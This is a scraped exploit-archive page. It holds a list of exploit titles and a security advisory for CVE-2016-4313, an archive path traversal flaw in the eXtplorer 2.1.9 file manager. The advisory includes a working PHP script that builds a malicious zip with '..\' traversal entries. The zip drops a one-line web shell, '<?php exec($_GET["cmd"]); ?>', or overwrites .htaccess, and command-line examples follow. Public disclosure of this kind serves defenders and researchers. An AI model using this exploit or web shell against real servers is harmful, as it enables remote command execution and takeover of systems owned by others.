
12 new exploits Microsoft Windows WebDAV - (ntdll.dll) Remote Exploit Microsoft Windows WebDAV - Remote PoC Exploit Microsoft Windows IIS WebDAV - 'ntdll.dll' Remote Exploit Microsoft Windows IIS 5.0 WebDAV - Remote PoC Exploit Microsoft Windows WebDav II - Remote Root Exploit (2) Microsoft Windows WebDAV - Remote Root Exploit (2) Microsoft Windows WebDav III - Remote Root Exploit (xwdav) Microsoft Windows WebDAV IIS 5.0 - Remote Root Exploit (3) (xwdav) Dream FTP 1.2 - Remote Format String Exploit BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit Apache Tomcat (webdav) - Remote File Disclosure Exploit Apache Tomcat (WebDAV) - Remote File Disclosure Exploit Apache Tomcat (webdav) - Remote File Disclosure Exploit (ssl support) Apache Tomcat (WebDAV) - Remote File Disclosure Exploit (SSL) Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch) Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Patch) Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (PHP) Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (PHP) Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC Windows 7 IIS 7.5 - FTPSVC UNAUTH'D Remote DoS PoC Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow Microsoft Windows IIS 5.0 WebDAV - ntdll.dll Path Overflow Liferay 6.0.x Webdav File Reading Vulnerability Liferay 6.0.x WebDAV - File Reading Vulnerability Microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities Microsoft IIS 6.0 and 7.5 (+ PHP) - Multiple Vulnerabilities Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1) Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2) Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3) Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4) Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (1) Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (2) Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (3) Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (4) BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (2) Sun Solaris 8/9 - Unspecified Passwd Local Root Compromise Vulnerability Invision Power Board 2.1.x IPSClass.PHP SQL Injection Vulnerability (1) Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness Apache HTTP Server <= 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting Weakness MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability EasyCafe Server <= 2.2.14 Remote File Read EasyCafe Server <= 2.2.14 - Remote File Read x86_64 Linux bind TCP port shellcode TCP Bindshell with Password Prompt - 162 bytes x86_64 Linux bind TCP port shellcode TCP Bindshell with Password Prompt - 162 bytes Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#) CakePHP Framework 3.2.4 - IP Spoofing Multiples Nexon Games - Unquoted Path Privilege Escalation eXtplorer 2.1.9 - Archive Path Traversal Web interface for DNSmasq / Mikrotik - SQL Injection Microsoft Excel 2010 - Crash PoC Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation Web2py 2.14.5 - Multiple Vulnerabilities
134 lines
No EOL
3.5 KiB
PHP
Executable file
134 lines
No EOL
3.5 KiB
PHP
Executable file
/*
|
|
[+] Credits: John Page aka hyp3rlinx
|
|
[+] Website: hyp3rlinx.altervista.org
|
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/EXTPLORER-ARCHIVE-PATH-TRAVERSAL.txt
|
|
[+] ISR: apparitionsec
|
|
|
|
Vendor:
|
|
==============
|
|
extplorer.net
|
|
|
|
Product:
|
|
==================
|
|
eXtplorer v2.1.9
|
|
|
|
eXtplorer is a PHP and Javascript-based File Manager, it allows to browse
|
|
directories, edit, copy, move, delete,
|
|
search, upload and download files, create & extract archives, create new
|
|
files and directories, change file
|
|
permissions (chmod) and more. It is often used as FTP extension for popular
|
|
applications like Joomla.
|
|
|
|
Vulnerability Type:
|
|
======================
|
|
Archive Path Traversal
|
|
|
|
CVE Reference:
|
|
==============
|
|
CVE-2016-4313
|
|
|
|
Vulnerability Details:
|
|
=====================
|
|
|
|
eXtplorer unzip/extract feature allows for path traversal as decompressed
|
|
files can be placed outside of the intended target directory,
|
|
if the archive content contains "../" characters. This can result in files
|
|
like ".htaccess" being overwritten or RCE / back door
|
|
exploits.
|
|
|
|
|
|
Tested on Windows
|
|
|
|
|
|
Reproduction steps:
|
|
==================
|
|
|
|
1) Generate an archive using below PHP script
|
|
2) Upload it to eXtplorer and then extract it
|
|
3) Check directory for the default 'RCE.php' file or use CL switch to
|
|
overwrite files like .htaccess
|
|
|
|
|
|
Exploit code(s):
|
|
===============
|
|
|
|
Run below PHP script from CL...
|
|
|
|
[evil-archive.php]
|
|
*/
|
|
|
|
<?php
|
|
|
|
if($argc<4){echo "Usage: <zip name>, <path depth>, <RCE.php as default?
|
|
Y/[file]>";exit();}
|
|
$zipname=$argv[1];
|
|
$exploit_file="RCE.php";
|
|
$cmd='<?php exec($_GET["cmd"]); ?>';
|
|
if(!empty($argv[2])&&is_numeric($argv[2])){
|
|
$depth=$argv[2];
|
|
}else{
|
|
echo "Second flag <path depth> must be numeric!, you supplied '$argv[2]'";
|
|
exit();
|
|
}
|
|
if(strtolower($argv[3])!="y"){
|
|
if(!empty($argv[3])){
|
|
$exploit_file=$argv[3];
|
|
}
|
|
if(!empty($argv[4])){
|
|
$cmd=$argv[4];
|
|
}else{
|
|
echo "Usage: enter a payload for file $exploit_file wrapped in double
|
|
quotes";
|
|
exit();
|
|
}
|
|
}
|
|
$zip = new ZipArchive();
|
|
$res = $zip->open("$zipname.zip", ZipArchive::CREATE);
|
|
$zip->addFromString(str_repeat("..\\", $depth).$exploit_file, $cmd);
|
|
$zip->close();
|
|
echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n";
|
|
echo "================ by hyp3rlinx ===================";
|
|
?>
|
|
|
|
/*
|
|
///////////////////////////////////////////////////////////////////////
|
|
|
|
[Script examples]
|
|
|
|
Use default RCE.php by passing "y" flag creating DOOM.zip with path depth
|
|
of 2 levels
|
|
c:\>php evil-archive.php DOOM 2 Y
|
|
|
|
|
|
Create DOOM.zip with path depth of 4 levels and .htaccess file to overwrite
|
|
one on the system.
|
|
c:\>php evil-archive.php DOOM 4 .htaccess "allow from all"
|
|
|
|
|
|
Disclosure Timeline:
|
|
===================================
|
|
Vendor Notification: No reply
|
|
May 14, 2016 : Public Disclosure
|
|
|
|
Exploitation Method:
|
|
======================
|
|
Local
|
|
|
|
Severity Level:
|
|
================
|
|
Medium 6.3
|
|
CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
|
|
|
|
[+] Disclaimer
|
|
The information contained within this advisory is supplied "as-is" with no
|
|
warranties or guarantees of fitness of use or otherwise.
|
|
Permission is hereby granted for the redistribution of this advisory,
|
|
provided that it is not altered except by reformatting it, and
|
|
that due credit is given. Permission is explicitly given for insertion in
|
|
vulnerability databases and similar, provided that due credit
|
|
is given to the author. The author is not responsible for any misuse of the
|
|
information contained herein and accepts no responsibility
|
|
for any damage caused by the use or misuse of this information.
|
|
|
|
hyp3rlinx
|
|
*/
|